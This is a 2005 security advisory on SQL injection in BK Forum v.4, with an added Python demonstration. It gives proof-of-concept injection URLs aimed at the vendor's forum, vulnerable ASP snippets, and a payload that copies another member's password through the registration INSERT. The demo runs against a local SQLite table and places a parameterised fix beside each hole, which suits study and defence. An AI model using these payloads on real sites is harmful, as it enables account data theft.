BK Forum v.4 contains multiple SQL injection vulnerabilities. The advisory includes example exploit URLs.
Dcrab 's Security Advisory
[Hsc Security Group] http://www.hackerscenter.com/
[dP Security] http://digitalparadox.org/
Get Dcrab's Services to audit your Web servers, scripts, networks, etc. Learn more at http://www.digitalparadox.org/services.ah
Severity: High
Title: Multiple SQL injection vulnerabilities in BK Forum v.4
Date: 23/04/2005
Vendor: BKdev
Vendor Website: http://www.bkdev.net
Summary: There are multiple SQL injection vulnerabilities in BK Forum v.4.
Proof of Concept Exploits:
http://forum.bkdev.net/member.asp?id=10%20UNION%20Select%20*%20from%20Member%20where%20memName%20=%20'dc'
[CODE]
' member.asp: the id query-string value is taken as-is
id = request.querystring("id")
' Numeric context with no quoting, so "10 UNION Select ..." is parsed as SQL
sql = "select * from Member where memID = " & id
set rs = conn.execute(sql)
[/CODE]
http://forum.bkdev.net/forum.asp?forum='SQL INJECTION
[CODE]
' Snippet given in the advisory for this entry (identical to the member.asp query above)
id = request.querystring("id")
sql = "select * from Member where memID = " & id
set rs = conn.execute(sql)
[/CODE]
http://forum.bkdev.net/register.asp
All form values are concatenated into the INSERT statement below and are vulnerable to SQL injection.
[CODE]
' register.asp: every form field is wrapped in single quotes by hand and never
' escaped, so a quote inside any field ends its literal and the remainder is
' parsed as SQL.  The #...# delimiters are Access/Jet date literals.
sql = "insert into Member (memName, memPassword, memFirstName, memLastName, memEmail, memHomepage, " & _
"memDate, memLevel, memSignature, memPic, memAbout, memAcceptNotification, memShowAvatar, memLoggedOn, " & _
"memLastActive) values ('" & memname & "', '" & mempw & "', '" & firstname & "', '" & lastname & "', " & _
"'" & email & "', '" & homepage & "', #" & now & "#, " & LEVEL_MEMBER & ", '" & signature & "', " & _
"'" & picture & "', '" & about & "', " & notify & ", " & avatar & ", " & false & ", #" & now & "#)"
[/CODE]
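The member.asp, forum.asp and register.asp cases above can be reproduced outside the forum. The following script is an added example, not code from the advisory or from BK Forum: it models the same string concatenation against an in-memory SQLite table that borrows the advisory's column names (the two sample accounts, the cut-down four-column Member table, the query shape assumed for forum.asp, and the memID 99 given to the new account are all assumptions made for the demo), decodes and runs the advisory's member.asp URL, shows the error that the bare quote in the forum.asp URL provokes, smuggles another member's password through the register.asp INSERT, and puts the parameterised query that closes each hole next to the vulnerable one. In Classic ASP the equivalent of the fixed functions is an ADODB.Command with values supplied through its Parameters collection instead of string concatenation.

```python
import sqlite3
from urllib.parse import unquote

# Constructed rows standing in for the forum's Member table (column names taken
# from the advisory's INSERT; the accounts and passwords are made up for this demo).
MEMBERS = [
    (10, "alice", "s3cret", "alice@example.org"),
    (11, "dc", "hunter2", "dc@example.org"),
]

# The id value from the advisory's member.asp proof-of-concept URL, still URL-encoded.
POC_MEMBER_ID = "10%20UNION%20Select%20*%20from%20Member%20where%20memName%20=%20'dc'"


def make_db():
    """Fresh in-memory database with a minimal Member table."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE Member (memID INTEGER, memName TEXT, memPassword TEXT, memEmail TEXT)"
    )
    conn.executemany("INSERT INTO Member VALUES (?, ?, ?, ?)", MEMBERS)
    return conn


def member_lookup_vulnerable(conn, id_param):
    """Mirrors member.asp: the id query-string value is glued into the SQL."""
    sql = "select * from Member where memID = " + id_param
    return conn.execute(sql).fetchall()


def member_lookup_fixed(conn, id_param):
    """Hardened form: reject anything that is not an integer, then bind it."""
    if not id_param.isdigit():
        raise ValueError("id must be a positive integer")
    return conn.execute("select * from Member where memID = ?", (int(id_param),)).fetchall()


def forum_probe_vulnerable(conn, forum_param):
    """Assumed shape of forum.asp (the advisory does not show its code): a string
    value concatenated inside quotes.  Returns the database error text that a
    stray quote produces, or None if the query ran cleanly."""
    sql = "select memID from Member where memName = '" + forum_param + "'"
    try:
        conn.execute(sql).fetchall()
        return None
    except sqlite3.OperationalError as exc:
        return str(exc)


def register_vulnerable(conn, memname, mempw):
    """Mirrors register.asp: every field is quoted by hand, none is escaped.
    memID 99 and the placeholder email are assumptions for the demo."""
    sql = (
        "insert into Member (memID, memName, memPassword, memEmail) values ("
        "99, '" + memname + "', '" + mempw + "', 'unset')"
    )
    conn.execute(sql)
    return conn.execute("select * from Member where memID = 99").fetchone()


def register_fixed(conn, memname, mempw):
    """Hardened form: placeholders, so quotes inside the input stay data."""
    conn.execute(
        "insert into Member (memID, memName, memPassword, memEmail) values (?, ?, ?, ?)",
        (99, memname, mempw, "unset"),
    )
    return conn.execute("select * from Member where memID = 99").fetchone()


def demo():
    """Run each vulnerable/fixed pair and collect the outcomes in a dict."""
    results = {}

    # member.asp: the advisory's UNION appends the 'dc' row to the id=10 lookup.
    conn = make_db()
    poc = unquote(POC_MEMBER_ID)
    results["union_names"] = sorted(row[1] for row in member_lookup_vulnerable(conn, poc))
    try:
        member_lookup_fixed(conn, poc)
        results["union_fixed_rejected"] = False
    except ValueError:
        results["union_fixed_rejected"] = True

    # forum.asp: the bare quote from the advisory's URL reaches the SQL parser
    # unescaped and produces a syntax error, the classic sign of injection.
    results["quote_error"] = forum_probe_vulnerable(conn, "'SQL INJECTION")

    # register.asp: close the memName literal early and put a subselect in the
    # memEmail position, so alice's password lands in the attacker's own row;
    # the trailing comment swallows the rest of the original VALUES list.
    payload = "x', 'pw', (select memPassword from Member where memName = 'alice')) --"
    results["stolen_email_field"] = register_vulnerable(make_db(), payload, "ignored")[3]
    fixed_row = register_fixed(make_db(), payload, "ignored")
    results["fixed_email_field"] = fixed_row[3]
    results["fixed_name_is_payload"] = fixed_row[1] == payload
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value!r}")
```

Running the script prints the UNION result containing both accounts, the rejection of the same payload by the fixed lookup, the database error text from the quote probe, and the password string that ends up in the attacker's email field, next to the harmless literal the parameterised INSERT stores instead.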
Keep your self updated, Rss feed at: http://digitalparadox.org/rss.ah
Author:
These vulnerabilities have been found and released by Diabolic Crab, Email: dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com, please feel free to contact me regarding these vulnerabilities. You can find me at http://www.hackerscenter.com or http://digitalparadox.org/. Look out for my forthcoming book on secure coding with PHP.
Sincerely,
Diabolic Crab
Web Security, Research & Development
dP Security
email: dcrab@digitalparadox.org
website: http://www.digitalparadox.org